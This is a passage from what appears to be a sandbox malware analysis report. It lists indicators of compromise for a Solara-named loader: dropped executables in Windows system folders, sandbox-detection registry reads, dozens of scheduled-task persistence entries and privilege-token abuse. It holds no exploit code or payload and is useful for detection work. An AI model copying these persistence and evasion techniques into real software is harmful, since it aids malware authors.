description ioc Process File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI7F18.tmp msiexec.exe File created C:\Windows\Installer\e57c96e.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created \??\c:\Windows\appcompat\Programs\RuntimeBroker.exe csc.exe File opened for modification C:\Windows\Installer\MSICE3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7DDF.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File opened for modification C:\Windows\Installer\MSIEB01.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC3.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIEAD1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID0FD.tmp msiexec.exe File created \??\c:\Windows\appcompat\Programs\CSC14994D18C06347C195CB8530C416BFE.TMP csc.exe File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File created C:\Windows\Logs\WindowsUpdate\69ddcba757bf72 RuntimeBroker.exe.exe File opened for modification C:\Windows\Installer\MSID050.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID18A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDFC4.tmp msiexec.exe File created C:\Windows\Logs\WindowsUpdate\smss.exe RuntimeBroker.exe.exe File opened for modification C:\Windows\Installer\MSI863D.tmp msiexec.exe File created C:\Windows\appcompat\Programs\RuntimeBroker.exe browserwinsvc.exe File created C:\Windows\appcompat\Programs\9e8d7a4ca61bd9 browserwinsvc.exe File opened for modification C:\Windows\Installer\e57c96a.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI7D03.tmp msiexec.exe File created C:\Windows\Installer\e57c96a.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 27 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz perfmon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz regedit.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 perfmon.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1\Configuration Data regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1\Component Information regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Capabilities regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\Component Information regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Configuration Data regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\ regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1\Identifier regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000\ regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Configuration Data regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BootArchitecture regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Configuration Data regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Identifier regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\PreferredProfile regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 regedit.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Software\Microsoft\Internet Explorer\TypedURLs taskmgr.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 39 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings ProcessHacker.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings solara.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings MsPortserver.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings Neo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2480455240-981575606-1030659066-1000\{123651AC-4369-445D-99A4-478F904010B6} msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2480455240-981575606-1030659066-1000\{BF7E5289-2D8A-495E-90FB-289F16117466} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings Solaradrive.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings Solarascripts.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 85660.crdownload:SmartScreen msedge.exe -
Runs regedit.exe 1 IoCs
pid Process 4536 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 872 schtasks.exe 3880 schtasks.exe 4868 schtasks.exe 1552 schtasks.exe 3828 schtasks.exe 3180 schtasks.exe 4516 schtasks.exe 2792 schtasks.exe 1860 schtasks.exe 800 schtasks.exe 4464 schtasks.exe 3332 schtasks.exe 4972 schtasks.exe 452 schtasks.exe 3116 schtasks.exe 3664 schtasks.exe 808 schtasks.exe 1712 schtasks.exe 1080 schtasks.exe 1512 schtasks.exe 3192 schtasks.exe 4560 schtasks.exe 1892 schtasks.exe 4792 schtasks.exe 1444 schtasks.exe 4320 schtasks.exe 3196 schtasks.exe 2128 schtasks.exe 3504 schtasks.exe 4672 schtasks.exe 1128 schtasks.exe 4204 schtasks.exe 4864 schtasks.exe 1892 schtasks.exe 4476 schtasks.exe 1640 schtasks.exe 1552 schtasks.exe 180 schtasks.exe 1068 schtasks.exe 4920 schtasks.exe 4876 schtasks.exe 4168 schtasks.exe 2128 schtasks.exe 728 schtasks.exe 1724 schtasks.exe 2208 schtasks.exe 4432 schtasks.exe 2784 schtasks.exe 448 schtasks.exe 2608 schtasks.exe 2156 schtasks.exe 2784 schtasks.exe 2972 schtasks.exe 3104 schtasks.exe 2984 schtasks.exe 3164 schtasks.exe 4608 schtasks.exe 1816 schtasks.exe 976 schtasks.exe 1948 schtasks.exe 4960 schtasks.exe 3060 schtasks.exe 3160 schtasks.exe 4448 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2648 SolaraBootstrapper.exe 2648 SolaraBootstrapper.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 2460 MsPortserver.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 1244 browserwinsvc.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe 2460 MsPortserver.exe -
Suspicious behavior: GetForegroundWindowSpam 8 IoCs
pid Process 4536 regedit.exe 3904 taskmgr.exe 2540 browserwinsvc.exe 4420 SearchApp.exe 2744 msiexec.exe 216 perfmon.exe 4608 ProcessHacker.exe 2904 csrss.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
pid Process 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 4016 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe 3632 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2648 SolaraBootstrapper.exe Token: SeDebugPrivilege 1244 browserwinsvc.exe Token: SeDebugPrivilege 2460 MsPortserver.exe Token: SeShutdownPrivilege 1752 msiexec.exe Token: SeIncreaseQuotaPrivilege 1752 msiexec.exe Token: SeSecurityPrivilege 2188 msiexec.exe Token: SeCreateTokenPrivilege 1752 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1752 msiexec.exe Token: SeLockMemoryPrivilege 1752 msiexec.exe Token: SeIncreaseQuotaPrivilege 1752 msiexec.exe Token: SeMachineAccountPrivilege 1752 msiexec.exe Token: SeTcbPrivilege 1752 msiexec.exe Token: SeSecurityPrivilege 1752 msiexec.exe Token: SeTakeOwnershipPrivilege 1752 msiexec.exe Token: SeLoadDriverPrivilege 1752 msiexec.exe Token: SeSystemProfilePrivilege 1752 msiexec.exe Token: SeSystemtimePrivilege 1752 msiexec.exe Token: SeProfSingleProcessPrivilege 1752 msiexec.exe Token: SeIncBasePriorityPrivilege 1752 msiexec.exe Token: SeCreatePagefilePrivilege 1752 msiexec.exe Token: SeCreatePermanentPrivilege 1752 msiexec.exe Token: SeBackupPrivilege 1752 msiexec.exe Token: SeRestorePrivilege 1752 msiexec.exe Token: SeShutdownPrivilege 1752 msiexec.exe Token: SeDebugPrivilege 1752 msiexec.exe Token: SeAuditPrivilege 1752 msiexec.exe Token: SeSystemEnvironmentPrivilege 1752 msiexec.exe Token: SeChangeNotifyPrivilege 1752 msiexec.exe Token: SeRemoteShutdownPrivilege 1752 msiexec.exe Token: SeUndockPrivilege 1752 msiexec.exe Token: SeSyncAgentPrivilege 1752 msiexec.exe Token: SeEnableDelegationPrivilege 1752 msiexec.exe Token: SeManageVolumePrivilege 1752 msiexec.exe Token: SeImpersonatePrivilege 1752 msiexec.exe Token: SeCreateGlobalPrivilege 1752 msiexec.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 5084 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2540 browserwinsvc.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeDebugPrivilege 944 WaveInstaller.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeRestorePrivilege 2188 msiexec.exe Token: SeTakeOwnershipPrivilege 2188 msiexec.exe Token: SeDebugPrivilege 4420 SearchApp.exe Token: SeDebugPrivilege 3916 Neo.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
